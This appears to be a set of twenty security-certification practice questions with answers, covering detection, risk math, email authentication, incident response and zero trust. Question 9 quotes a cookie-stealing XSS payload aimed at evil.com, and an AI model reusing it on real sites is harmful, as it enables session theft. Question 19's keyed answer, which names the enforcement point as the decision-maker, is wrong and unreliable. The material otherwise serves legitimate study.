7.3. Practice Questions

These questions cross domain boundaries, simulating the integrative style of the actual exam.

Question 1. A company discovers that an attacker has been in their network for three months, exfiltrating customer data through encrypted HTTPS connections to an external server. Which security capability would have been MOST effective at detecting this activity earlier?

A. Network-based IDS with signature detection B. Web application firewall (WAF) C. User and Entity Behavior Analytics (UEBA) D. Network Access Control (NAC)

Answer: C. UEBA establishes baseline behavior and detects anomalies like unusual data transfer volumes, abnormal access patterns, or communication with unfamiliar external servers. The encrypted HTTPS connections would bypass signature-based IDS (A), a WAF protects web applications not outbound connections (B), and NAC controls device admission, not ongoing behavior (D).

Question 2. An organization's risk assessment identifies a vulnerability with a CVSS score of 9.8 on an internal server that stores archived marketing materials. The same assessment finds a CVSS score of 6.5 vulnerability on the internet-facing payment processing API. Which should be remediated FIRST?

A. The CVSS 9.8 vulnerability because it has a higher severity score B. The CVSS 6.5 vulnerability because the asset is more critical and exposed C. Both simultaneously because all critical vulnerabilities require immediate attention D. Neither — both should go through the standard change management process

Answer: B. Context-based prioritization considers asset criticality and exposure, not just CVSS scores. The payment API is internet-facing (higher exposure), processes financial data (higher asset criticality), and handles regulated data (PCI DSS implications). The archived marketing server, despite the higher CVSS score, has lower business impact.

Question 3. A security analyst receives an alert that an employee's account is accessing the HR database at 2:00 AM from a foreign IP address. The employee is a marketing coordinator with no legitimate need for HR data. Which THREE actions should the analyst take FIRST? (Choose 3)

A. Disable the employee's account immediately B. Notify law enforcement C. Verify the alert is not a false positive by checking additional data sources D. Begin a full forensic investigation of the employee's workstation E. Document the event and escalate to the incident response team F. Isolate the affected systems from the network

Answer: A, C, E. The analyst should verify the alert (C — check for VPN use, scheduled tasks, or account compromise), disable the account to prevent further unauthorized access (A — containment), and document and escalate (E — proper incident response process). Law enforcement (B) comes later. Full forensics (D) requires IR team involvement. System isolation (F) may be premature before confirming the scope.

Question 4. A company wants to ensure that emails sent from their domain cannot be spoofed. They have already implemented SPF. What should they implement NEXT for the most effective email authentication?

A. S/MIME encryption for all outbound emails B. DKIM to add digital signatures to outbound emails C. A spam filter with machine learning capabilities D. TLS encryption for mail server connections

Answer: B. DKIM adds cryptographic signatures to emails, proving they haven't been modified in transit. Combined with SPF (which validates the sending server), DKIM provides the foundation for DMARC enforcement. S/MIME (A) encrypts email content, which is different from preventing spoofing. Spam filtering (C) is a receiving-side control. TLS (D) encrypts transport but doesn't authenticate the sender.

Question 5. An organization calculates that a server worth $600,000 faces a threat with a 20% exposure factor occurring 0.5 times per year. Cyber insurance costs $50,000/year. What is the ALE, and is insurance cost-effective?

A. ALE = $60,000; insurance is not cost-effective B. ALE = $120,000; insurance is cost-effective C. ALE = $60,000; insurance is cost-effective D. ALE = $120,000; insurance is not cost-effective

Answer: C. SLE = AV × EF = $600,000 × 0.20 = $120,000. ALE = SLE × ARO = $120,000 × 0.5 = $60,000/year. Insurance costs $50,000/year, which is less than the ALE of $60,000 — so insurance IS cost-effective. The organization saves $10,000/year in expected loss by transferring the risk. Answer A has the correct ALE but wrong conclusion. Answer B has the wrong ALE.

Question 6. During a penetration test, the tester discovers they can escalate from a standard user account to domain administrator by exploiting a misconfigured Group Policy. This is an example of:

A. Horizontal privilege escalation B. Vertical privilege escalation C. Lateral movement D. Credential stuffing

Answer: B. Vertical privilege escalation moves from a lower privilege level (standard user) to a higher one (domain administrator). Horizontal escalation (A) would be accessing another standard user's account. Lateral movement (C) is moving between systems at the same privilege level. Credential stuffing (D) uses stolen credentials from other breaches.

Question 7. A company implements WPA3-Enterprise for its wireless network. Which authentication method does this use?

A. Pre-shared key (PSK) B. 802.1X with a RADIUS server C. Open authentication with MAC filtering D. Simultaneous Authentication of Equals (SAE) with a shared password

Answer: B. WPA3-Enterprise uses 802.1X authentication with a RADIUS server, providing per-user credentials and certificates. WPA3-Personal uses SAE (D), which replaces the PSK four-way handshake from WPA2. PSK (A) is WPA2-Personal. Open authentication with MAC filtering (C) provides no real security.

Question 8. An organization discovers that a former employee's VPN account is still active three months after termination. Which control failure is MOST directly responsible?

A. Lack of multifactor authentication B. Inadequate offboarding procedures C. Missing intrusion detection system D. Insufficient password complexity requirements

Answer: B. The offboarding process should ensure timely and comprehensive access revocation across all systems. MFA (A) would add a layer but doesn't address the root cause — the account shouldn't exist at all. IDS (C) might detect usage but not prevent it. Password complexity (D) is unrelated to account lifecycle management.

Question 9. A security analyst sees the following in a web server log: GET /search?q=<script>document.location='http://evil.com/steal?c='+document.cookie</script>. What type of attack is this?

A. SQL injection B. Cross-site scripting (XSS) C. Cross-site request forgery (CSRF) D. Server-side request forgery (SSRF)

Answer: B. The <script> tag injected into a URL parameter is a reflected XSS attack attempting to steal cookies. SQL injection (A) would inject SQL commands like ' OR 1=1. CSRF (C) tricks authenticated users into submitting unwanted requests — it doesn't inject scripts. SSRF (D) exploits server-side URL fetching.

Question 10. An organization's SIEM generates 5,000 alerts per day. The security team can investigate 50. Most alerts are false positives. What should the team do FIRST?

A. Purchase an XDR solution to replace the SIEM B. Hire additional security analysts C. Tune SIEM detection rules and correlation logic D. Disable low-priority alert categories

Answer: C. Tuning reduces false positives by refining correlation rules, adjusting thresholds, and adding context (known-good baselines, asset criticality). Replacing the SIEM (A) moves the problem to a new tool. Hiring (B) is expensive and doesn't fix the root cause. Disabling categories (D) risks missing real threats. Tune first, then assess if additional resources are needed.

Question 11. Which of the following BEST describes the difference between a vulnerability scan and a penetration test?

A. Vulnerability scans are automated; penetration tests are always manual B. Vulnerability scans identify weaknesses; penetration tests attempt to exploit them C. Vulnerability scans test external systems; penetration tests test internal systems D. Vulnerability scans require credentials; penetration tests do not

Answer: B. The fundamental distinction: scanning finds known vulnerabilities by checking versions and configurations against databases. Penetration testing actively attempts exploitation, chains vulnerabilities, and demonstrates actual business impact. Scans can be manual or automated (A is incorrect). Both can test internal or external (C is incorrect). Both can use credentials or not (D is incorrect).

Question 12. A user reports receiving an urgent text message claiming to be from their bank, asking them to click a link to verify a suspicious transaction. What type of attack is this?

A. Vishing B. Phishing C. Smishing D. Whaling

Answer: C. Smishing is SMS-based phishing (text messages). Vishing (A) is voice/phone-based phishing. Standard phishing (B) is email-based. Whaling (D) targets senior executives specifically. The delivery channel determines the term: email = phishing, phone = vishing, text = smishing.

Question 13. An organization needs to ensure that a third-party cloud provider meets specific uptime and incident notification requirements. Which document type is MOST appropriate?

A. Non-disclosure agreement (NDA) B. Memorandum of understanding (MOU) C. Service level agreement (SLA) D. Business partners agreement (BPA)

Answer: C. SLAs define measurable performance requirements with penalties for non-compliance — uptime percentages, response times, and notification timelines are all SLA elements. NDAs (A) protect confidentiality. MOUs (B) document mutual intent without strict enforcement. BPAs (D) define partner responsibilities in a business relationship.

Question 14. A company implements role-based access control. A database administrator changes departments to marketing but retains their DBA privileges. What security principle is being violated?

A. Separation of duties B. Least privilege C. Need to know D. Defense in depth

Answer: B. Least privilege requires that users have only the minimum permissions needed for their current role. When the DBA moved to marketing, their DBA privileges should have been revoked through access recertification. Separation of duties (A) prevents a single person from completing a critical task alone. Need to know (C) restricts access to information required for current assignments — related but less specific. Defense in depth (D) is about layered controls.

Question 15. Which backup strategy requires the LEAST storage space but takes the LONGEST to restore?

A. Full backup B. Incremental backup C. Differential backup D. Snapshot

Answer: B. Incremental backups only store changes since the last backup of any type, using the least storage. However, restoration requires the last full backup plus every incremental since — the most complex and time-consuming restore. Differential (C) stores changes since the last full backup — more storage than incremental but faster restore (only needs full + latest differential). Full (A) uses the most storage but restores fastest.

Question 16. An attacker sends thousands of login attempts using the password "Summer2025!" against every account in the organization. What type of attack is this?

A. Brute force B. Dictionary attack C. Password spraying D. Credential stuffing

Answer: C. Password spraying uses a small number of common passwords against many accounts (horizontal attack). This evades account lockout policies because each account sees only one or two failed attempts. Brute force (A) tries many passwords against one account (vertical). Dictionary attacks (B) use wordlists against targeted accounts. Credential stuffing (D) uses previously breached username/password pairs.

Question 17. A company stores customer credit card numbers. To reduce PCI DSS scope, they replace stored card numbers with randomly generated tokens that have no mathematical relationship to the original numbers. What technique is this?

A. Encryption B. Hashing C. Data masking D. Tokenization

Answer: D. Tokenization replaces sensitive data with non-sensitive tokens that can be mapped back to the original through a secure token vault. Because tokens have no mathematical relationship to the card numbers, systems handling tokens are outside PCI DSS scope. Encryption (A) is reversible with a key but the encrypted data is still considered cardholder data under PCI DSS. Hashing (B) is one-way and can't retrieve the original. Data masking (C) is irreversible in the masked copy.

Question 18. During incident response, the security team has confirmed a ransomware infection on 15 workstations. The malware is still spreading via an SMB vulnerability. What phase of incident response are they in, and what is the IMMEDIATE priority?

A. Detection phase — scan all systems to identify the malware variant B. Containment phase — isolate affected systems and block SMB traffic on vulnerable segments C. Eradication phase — remove the ransomware and patch the SMB vulnerability D. Recovery phase — restore systems from backups

Answer: B. With confirmed infection and active spreading, the immediate priority is containment — stopping the spread. This means isolating affected workstations (network quarantine) and blocking the exploitation vector (SMB traffic rules). Detection (A) is already complete — they've confirmed the infection. Eradication (C) and recovery (D) come after containment stops the bleeding.

Question 19. An organization wants to implement Zero Trust architecture. Which component makes the final allow/deny decision for each access request?

A. Policy Engine B. Policy Enforcement Point C. Policy Administrator D. Identity Provider

Answer: B. The Policy Enforcement Point (PEP) is the gatekeeper that enforces the access decision — it sits in the data plane and allows or blocks the connection. The Policy Engine (A) evaluates the request against policies and decides whether to grant access (control plane). The Policy Administrator (C) communicates the decision from the engine to the enforcement point. The Identity Provider (D) authenticates users but doesn't make access decisions.

Question 20. A forensic investigator needs to prove that digital evidence hasn't been altered since collection. Which technique provides this assurance?

A. Encryption of the evidence drive B. Cryptographic hash of the forensic image C. Chain of custody documentation D. Write-blocking during acquisition

Answer: B. A cryptographic hash (SHA-256) of the forensic image creates a unique fingerprint. If the hash of the evidence matches the hash taken at acquisition, the evidence hasn't been altered. Encryption (A) protects confidentiality, not integrity verification. Chain of custody (C) documents who handled the evidence and when — essential for admissibility but doesn't prove integrity. Write-blocking (D) prevents alteration during acquisition but doesn't verify integrity after the fact.